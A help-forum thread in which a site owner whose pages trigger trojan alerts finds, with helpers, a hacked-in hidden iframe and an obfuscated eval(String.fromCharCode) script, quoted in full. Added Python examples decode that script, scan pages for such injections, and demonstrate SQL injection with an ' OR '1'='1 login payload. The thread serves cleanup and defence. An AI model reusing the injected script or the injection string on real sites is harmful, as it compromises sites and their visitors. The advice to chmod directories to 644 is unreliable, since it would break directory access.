Help! My website is causing browsers to get HTML:IFrame-EE Trojan! and Mal/EncPk-F & Mal/HckPk-A also

I have a web site (I will give you the URL if someone says it is OK) on which I've had a couple of browsers get this message from AVAST:
HTML:IFrame-EJ [trj]
Type: Trojan Horse

I also have once gotten the malware Mal/EncPk-F and Mal/HckPk-A (Sophos Anti-Virus) when visiting the site.

My hosting is through Go Daddy, and they insist there is no virus or trojan on their end.

Don't get me wrong - the website usually works without a problem; but we are getting ready to promote the website & I don't want any hint of malware coming to my site.

My site is on a UNIX server and I am using PHP & MySQL. I am using sessions on every page.
oh_maestro asked:
Rich Rumble (Security Samurai) commented:
Look for code that is not your own: open your page, view source, and use Firefox with the Firebug extension if you need help viewing any JavaScript. Do this from a Unix machine if possible. If you find code that is not your own, remove it. Look through logs if you can to find out how it got there. What does the site use, phpBB code? MediaWiki code?
We can look at the url (please break it, hxxp://example.com) but really you need to find the injected files and see if go-daddy can help determine how they got there.
-rich
0

warturtle commented:
Yes, search for 'iframe' within your code and see if the attribute of the iframe is set to be invisible; that might trigger the antiviruses. See if it's your own code or if GoDaddy has put in an iframe there for advertising purposes.
0
oh_maestro (Author) commented:
hxxp://www.openhousesohio.com

Using Firebug, I found this:
<iframe height="3" width="1" src="http://foxionserl.com/">
 and this
<script type="text/javascript">
eval(String.fromCharCode(118,97,114,32,120,101,119,61,57,56,55,49,51,49,49,59,118,97,114,32,103,104,103,52,53,61,34,102,111,120,105,34,59,118,97,114,32,119,61,34,111,110,34,59,118,97,114,32,114,101,54,61,34,115,101,114,108,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,100,40,41,123,118,97,114,32,115,61,52,51,52,53,59,125,32,118,97,114,32,114,114,101,61,56,56,50,56,51,56,50))

I did not type any of this code.

I do not see this code when I go to View > Source in IE. I also do not see anything like this in my code.
My main editor is Macromedia Dreamweaver MX 2004, and I have to FTP files to my GoDaddy account. I am using PHP 4.

Has my site been hacked?
0
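As an added example (not code from the thread or from any of the posters), the following Python script decodes the eval(String.fromCharCode(...)) payload pasted above without executing any of it: it maps the character codes back to text, collects the string variables, and statically rebuilds what document.write() would emit, so the hidden iframe and the host it points at can be read off. The regular expressions are written for this sample's shape (double-quoted `var x="..."` pieces concatenated with `+` inside one document.write call), which is an assumption that will not hold for every obfuscator.

```python
import re

# The obfuscated <script> oh_maestro found appended to the page, copied verbatim from the post above.
INJECTED_SCRIPT = ('<script type="text/javascript">\n'
                   'eval(String.fromCharCode(118,97,114,32,120,101,119,61,57,56,55,49,51,49,49,59,118,97,114,32,103,104,103,52,53,61,34,102,111,120,105,34,59,118,97,114,32,119,61,34,111,110,34,59,118,97,114,32,114,101,54,61,34,115,101,114,108,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,100,40,41,123,118,97,114,32,115,61,52,51,52,53,59,125,32,118,97,114,32,114,114,101,61,56,56,50,56,51,56,50))\n'
                   '</script>')

CHARCODE_RE = re.compile(r'String\.fromCharCode\(\s*([\d\s,]+)\)')
# Assumption about this sample's shape: the string pieces live in double-quoted `var x="..."` assignments.
ASSIGN_RE = re.compile(r'var\s+([A-Za-z_$][\w$]*)\s*=\s*"([^"]*)"')
WRITE_RE = re.compile(r'document\.write\((.*?)\);', re.S)
TOKEN_RE = re.compile(r"'([^']*)'|\"([^\"]*)\"|([A-Za-z_$][\w$]*)")
IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.I)
ATTR_RE = re.compile(r'([\w-]+)\s*=\s*"([^"]*)"')


def decode_fromcharcode(script, max_depth=5):
    """Stage 1: replace each String.fromCharCode(n1,n2,...) with the text it builds.

    Nothing is evaluated; decoding repeats in case a decoded layer hides another one."""
    layers, pending = [], [script]
    for _ in range(max_depth):
        found = []
        for text in pending:
            for m in CHARCODE_RE.finditer(text):
                codes = [int(n) for n in m.group(1).split(',') if n.strip()]
                found.append(''.join(chr(c) for c in codes))
        if not found:
            break
        layers.extend(found)
        pending = found
    return layers


def resolve_document_write(decoded):
    """Stage 2: rebuild what each document.write() would emit by substituting the
    string variables into the '...'+var+'...' concatenation, in source order."""
    variables = dict(ASSIGN_RE.findall(decoded))
    written = []
    for m in WRITE_RE.finditer(decoded):
        pieces = []
        for single, double, ident in TOKEN_RE.findall(m.group(1)):
            if ident:
                pieces.append(variables.get(ident, '<unresolved:%s>' % ident))
            else:
                pieces.append(single or double)
        written.append(''.join(pieces))
    return written


def analyze(script):
    """Run both stages and list every iframe the script would inject, with its attributes."""
    report = {'decoded': [], 'written': [], 'iframes': []}
    for layer in decode_fromcharcode(script):
        report['decoded'].append(layer)
        for html in resolve_document_write(layer):
            report['written'].append(html)
            for m in IFRAME_RE.finditer(html):
                report['iframes'].append(
                    {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))})
    return report


if __name__ == '__main__':
    result = analyze(INJECTED_SCRIPT)
    print('decoded :', result['decoded'][0])
    print('written :', result['written'])
    print('iframes :', result['iframes'])
```

The decoded first layer is ordinary JavaScript that splits "iframe", "http://" and the host name into short string variables before joining them, which is why a plain search of the source for "iframe" or the host name finds nothing. The rebuilt document.write output is the same 1x3 pixel iframe that Firebug showed in the rendered DOM, so the two observations in the post above are one and the same injection.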
oh_maestro (Author) commented:
Increasing Pts!
0
warturtle commented:
Hello,

Thanks for sending us more information. Have a look at this link:

http://www.directadmin.com/forum/showthread.php?p=157818

It might be worth finding out if someone else had access to your account. Try changing the password as a first step, and make it very difficult to guess, with capital letters, small letters, numbers, and 8 digits or over in length as well.

I've just been to the website as well and didn't see any iframe in the source code (but I did see the long JavaScript code with lots of numbers, and strangely enough it was appearing after the </html> tag, which marks the end of the webpage). I think contacting GoDaddy would be a good idea to have them look at your setup.

Hope it helps.
0
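The checks suggested in this thread (Rich's "look for code that is not your own", warturtle's search for invisible iframes, and the script found after the </html> tag) can be automated over the files pulled back from the server. The following Python script is an added example, not code from the thread or from any poster; the sample page it scans is constructed here, and the size threshold and signature patterns are assumptions chosen for this thread's symptoms, not a general malware scanner.

```python
import hashlib
import re

# Constructed sample of a deployed page: the owner's own markup with a normal-sized embed,
# plus attacker content appended after </html> in the way warturtle observed on the live site.
SAMPLE_PAGE = """<html>
<head><title>Open Houses</title></head>
<body>
<h1>Listings</h1>
<iframe src="http://maps.example.com/embed" width="400" height="300"></iframe>
<p>Contact us for a showing.</p>
</body>
</html>
<iframe height="3" width="1" src="http://foxionserl.com/"></iframe>
<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,120,61,49))</script>
"""

HTML_END_RE = re.compile(r'</html\s*>', re.I)
IFRAME_RE = re.compile(r'<iframe\b([^>]*)>', re.I)
SCRIPT_RE = re.compile(r'<script\b[^>]*>(.*?)</script>', re.I | re.S)
ATTR_RE = re.compile(r'([\w-]+)\s*=\s*"([^"]*)"')
HIDDEN_STYLE_RE = re.compile(r'display\s*:\s*none|visibility\s*:\s*hidden', re.I)
OBFUSCATION_RE = re.compile(r'eval\s*\(|String\.fromCharCode|unescape\s*\(')
TINY_PX = 10  # assumed threshold: an iframe narrower or shorter than this shows nothing a visitor could use


def _pixels(value):
    """Parse a width/height attribute; None when absent or not a plain number."""
    return int(value) if value is not None and value.isdigit() else None


def scan_html(html):
    """Return (kind, detail) findings for the three signs seen in this thread:
    content after </html>, iframes too small or styled to be invisible, obfuscated scripts."""
    findings = []
    end = HTML_END_RE.search(html)
    if end and html[end.end():].strip():
        findings.append(('content-after-html', html[end.end():].strip()[:80]))
    for m in IFRAME_RE.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        width, height = _pixels(attrs.get('width')), _pixels(attrs.get('height'))
        tiny = (width is not None and width < TINY_PX) or (height is not None and height < TINY_PX)
        if tiny or HIDDEN_STYLE_RE.search(attrs.get('style', '')):
            findings.append(('hidden-iframe', attrs.get('src', '')))
    for m in SCRIPT_RE.finditer(html):
        if OBFUSCATION_RE.search(m.group(1)):
            findings.append(('obfuscated-script', m.group(1).strip()[:80]))
    return findings


def _digest(text):
    return hashlib.sha256(text.encode('utf-8')).hexdigest()


def changed_files(local, deployed):
    """Compare the site as kept in the local editor (the Dreamweaver copy) with what is on
    the server, both given as {path: content}. Anything modified on the server, or present
    there but not in the local copy, is 'code that is not your own'."""
    modified = sorted(p for p in local if p in deployed and _digest(local[p]) != _digest(deployed[p]))
    unexpected = sorted(p for p in deployed if p not in local)
    return {'modified': modified, 'unexpected': unexpected}


if __name__ == '__main__':
    for kind, detail in scan_html(SAMPLE_PAGE):
        print('%-20s %s' % (kind, detail))
```

Run scan_html over each HTML or PHP file downloaded from the host (the PHP source, not the rendered output, for files the attacker edited on disk) and changed_files over the full tree against the local copy; the second check is the more reliable one, since it also catches new files and edits that do not match any signature.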
Rich Rumble (Security Samurai) commented:
PHP 4 is pretty old; you should upgrade if possible. There were several SQL injection attacks against that version of DW, so make sure it's patched and updated: http://secunia.com/advisories/product/3194/?task=advisories
Find anything that is not yours on your server, and clean it out. Then chmod 644 every directory that does not need write access. Is this a GoDaddy server? They should provide more up-to-date instances of PHP.

http://www.UnmaskParasites.com/security-report/?page=openhousesohio.com
http://www.google.com/safebrowsing/diagnostic?site=openhousesohio.com
https://www.google.com/accounts/ServiceLoginAuth?service=sitemaps
http://www.directadmin.com/forum/showthread.php?p=157818
-rich
0
Rich Rumble (Security Samurai) commented:
I think your login form needs sanitization. Download the xss-me and sql-inject-me Firefox extensions, go to your login page, right click and select "open xss me sidebar" or the sql-inject-me sidebar, and run all tests.
Read up on input validation/sanitization, xss and sql injection: http://shiflett.org/articles
I think he wrote and developed mysql_real_escape_string for php: http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
http://code.google.com/p/inspekt/
-rich
0
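As an added example (not code from the thread or from any poster), here is the login query Rich is describing in its vulnerable and its parameterized form, side by side. Python's sqlite3 module stands in for the site's MySQL database, since the point is how the query is built rather than which database runs it; the users table and credentials are constructed sample data.

```python
import sqlite3

# Constructed stand-in for the site's MySQL users table. Plain-text passwords are used only to
# keep the demonstration short; a real table stores a password hash, never the password itself.
SAMPLE_USERS = [('alice', 'correct horse'), ('bob', 'battery staple')]


def make_db():
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users (username TEXT, password TEXT)')
    conn.executemany('INSERT INTO users VALUES (?, ?)', SAMPLE_USERS)
    conn.commit()
    return conn


def login_unsafe(conn, username, password):
    """The pattern Rich is warning about: form fields spliced straight into the SQL text,
    so a quote in the input ends the string literal and the rest is parsed as SQL."""
    sql = "SELECT username FROM users WHERE username='%s' AND password='%s'" % (username, password)
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterized query: the values travel separately from the statement, so quotes in
    them stay data. In PHP the same effect comes from prepared statements (mysqli/PDO) or,
    with the old mysql_* functions, from mysql_real_escape_string() on every value."""
    sql = 'SELECT username FROM users WHERE username=? AND password=?'
    return conn.execute(sql, (username, password)).fetchone() is not None


def compare(username, password):
    """Run both implementations on one credential pair; returns (unsafe_result, safe_result)."""
    conn = make_db()
    try:
        return login_unsafe(conn, username, password), login_safe(conn, username, password)
    finally:
        conn.close()


if __name__ == '__main__':
    print('valid credentials  :', compare('alice', 'correct horse'))
    print('wrong password     :', compare('alice', 'nope'))
    print('tautology in field :', compare('alice', "' OR '1'='1"))
```

The third case is the classic test that the sql-inject-me extension runs against a form: the unsafe version accepts the login because the password field has turned the WHERE clause into `password='' OR '1'='1'`, while the parameterized version simply compares the whole string against the stored value and rejects it.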
oh_maestro (Author) commented:
The long Javascript code at the end was the culprit. Someone had hacked into my website and put that at the bottom of the page. I was able to get it removed from my site, and I have a whole new list of tougher passwords.
Thanks!
0
Rich Rumble (Security Samurai) commented:
Glad to help, and beyond password choices, input validation is a must to avoid SQL injection. The site looks solid from an XSS point of view, but SQL injection on your login form could be worse.
Good luck!
-rich
0
warturtle commented:
That's good stuff! Thanks for the feedback :)
0